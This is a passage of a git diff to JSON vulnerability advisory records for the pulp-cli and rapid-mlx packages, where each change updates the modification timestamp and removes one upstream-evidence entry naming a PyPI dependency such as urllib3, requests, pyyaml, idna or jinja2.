"strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2015-2296.json b/advisories/BREW-pulp-cli-CVE-2015-2296.json index 414fbab225..4608bcfa8d 100644 --- a/advisories/BREW-pulp-cli-CVE-2015-2296.json +++ b/advisories/BREW-pulp-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2015-2296", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2016-9015.json b/advisories/BREW-pulp-cli-CVE-2016-9015.json index 2e816d016e..b326a70716 100644 --- a/advisories/BREW-pulp-cli-CVE-2016-9015.json +++ b/advisories/BREW-pulp-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2016-9015", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2017-18342.json b/advisories/BREW-pulp-cli-CVE-2017-18342.json index 9adb7624bb..eb2913ac37 100644 --- a/advisories/BREW-pulp-cli-CVE-2017-18342.json +++ b/advisories/BREW-pulp-cli-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2017-18342", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-18074.json b/advisories/BREW-pulp-cli-CVE-2018-18074.json index 68effdf3e6..bb468b4948 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-18074.json +++ b/advisories/BREW-pulp-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-18074", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-20060.json b/advisories/BREW-pulp-cli-CVE-2018-20060.json index bcfbb4ec37..4f0167f96b 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-20060.json +++ b/advisories/BREW-pulp-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-20060", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2018-25091.json b/advisories/BREW-pulp-cli-CVE-2018-25091.json index c5463bc0f6..d443cb97b4 100644 --- a/advisories/BREW-pulp-cli-CVE-2018-25091.json +++ b/advisories/BREW-pulp-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2018-25091", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-11236.json b/advisories/BREW-pulp-cli-CVE-2019-11236.json index c994d4b660..e84cd83a7e 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-11236.json +++ b/advisories/BREW-pulp-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2019-11236", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-11324.json b/advisories/BREW-pulp-cli-CVE-2019-11324.json index e39640f74a..629bfe1b05 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-11324.json +++ b/advisories/BREW-pulp-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2019-11324", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-20477.json b/advisories/BREW-pulp-cli-CVE-2019-20477.json index 39ab4daa05..ec7765a852 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-20477.json +++ b/advisories/BREW-pulp-cli-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2019-20477", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-14343.json b/advisories/BREW-pulp-cli-CVE-2020-14343.json index 52c30c5fc4..bb87a085f8 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-14343.json +++ b/advisories/BREW-pulp-cli-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-14343", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-1747.json b/advisories/BREW-pulp-cli-CVE-2020-1747.json index f6f9921a08..86935d9b49 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-1747.json +++ b/advisories/BREW-pulp-cli-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-1747", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-26137.json b/advisories/BREW-pulp-cli-CVE-2020-26137.json index 44e114199b..0ed3096fc4 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-26137.json +++ b/advisories/BREW-pulp-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-26137", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-7212.json b/advisories/BREW-pulp-cli-CVE-2020-7212.json index 011acc587a..10206a2dab 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-7212.json +++ b/advisories/BREW-pulp-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-7212", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2021-28363.json b/advisories/BREW-pulp-cli-CVE-2021-28363.json index 5ddb6f52ed..ee2f511d79 100644 --- a/advisories/BREW-pulp-cli-CVE-2021-28363.json +++ b/advisories/BREW-pulp-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2021-28363", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2021-33503.json b/advisories/BREW-pulp-cli-CVE-2021-33503.json index 0ed9864bb1..90adfdf610 100644 --- a/advisories/BREW-pulp-cli-CVE-2021-33503.json +++ b/advisories/BREW-pulp-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2021-33503", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-32681.json b/advisories/BREW-pulp-cli-CVE-2023-32681.json index 946d1f2286..bf10366b25 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-32681.json +++ b/advisories/BREW-pulp-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-32681", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-43804.json b/advisories/BREW-pulp-cli-CVE-2023-43804.json index 5dbc16be47..9c94f4ab5e 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-43804.json +++ b/advisories/BREW-pulp-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-43804", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-45803.json b/advisories/BREW-pulp-cli-CVE-2023-45803.json index 9ce50c1bc2..5ed53dd32d 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-45803.json +++ b/advisories/BREW-pulp-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-45803", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-35195.json b/advisories/BREW-pulp-cli-CVE-2024-35195.json index 3e1077ef2f..c16330b938 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-35195.json +++ b/advisories/BREW-pulp-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-35195", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-3651.json b/advisories/BREW-pulp-cli-CVE-2024-3651.json index 69cba241d3..2fc43e6f9d 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-3651.json +++ b/advisories/BREW-pulp-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-3651", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-23T21:21:29Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-37891.json b/advisories/BREW-pulp-cli-CVE-2024-37891.json index 18c51df577..90e2cd9276 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-37891.json +++ b/advisories/BREW-pulp-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-37891", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-47081.json b/advisories/BREW-pulp-cli-CVE-2024-47081.json index a6499ed434..6f4aed06c5 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-47081.json +++ b/advisories/BREW-pulp-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-47081", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-50181.json b/advisories/BREW-pulp-cli-CVE-2025-50181.json index 2b31eacfb8..b811baae5e 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-50181.json +++ b/advisories/BREW-pulp-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-50181", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-50182.json b/advisories/BREW-pulp-cli-CVE-2025-50182.json index 1b07a359fc..ac7bbe4d37 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-50182.json +++ b/advisories/BREW-pulp-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-50182", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-66418.json b/advisories/BREW-pulp-cli-CVE-2025-66418.json index ac77c33c44..b87e76784f 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-66418.json +++ b/advisories/BREW-pulp-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-66418", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-66471.json b/advisories/BREW-pulp-cli-CVE-2025-66471.json index be3229268c..1d4de7461d 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-66471.json +++ b/advisories/BREW-pulp-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-66471", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-21441.json b/advisories/BREW-pulp-cli-CVE-2026-21441.json index fe974d1861..1431eb8142 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-21441.json +++ b/advisories/BREW-pulp-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-21441", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-25645.json b/advisories/BREW-pulp-cli-CVE-2026-25645.json index 16ae209587..d476727531 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-25645.json +++ b/advisories/BREW-pulp-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-25645", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-44431.json b/advisories/BREW-pulp-cli-CVE-2026-44431.json index 3974fbd37a..423bc8e9bf 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-44431.json +++ b/advisories/BREW-pulp-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-44431", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-44432.json b/advisories/BREW-pulp-cli-CVE-2026-44432.json index c82567cd1e..4183bb0cd5 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-44432.json +++ b/advisories/BREW-pulp-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-44432", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-45409.json b/advisories/BREW-pulp-cli-CVE-2026-45409.json index e4ebc89e15..c18270aebd 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-45409.json +++ b/advisories/BREW-pulp-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-45409", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-23T21:21:29Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-0012.json b/advisories/BREW-rapid-mlx-CVE-2014-0012.json index 40784b615d..670978d8e6 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-0012.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-0012", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1402.json b/advisories/BREW-rapid-mlx-CVE-2014-1402.json index 82f55412c0..2d3af776f1 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1402.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1402", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1829.json b/advisories/BREW-rapid-mlx-CVE-2014-1829.json index 1b79642b2d..a47af64bbc 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1829.json +++ 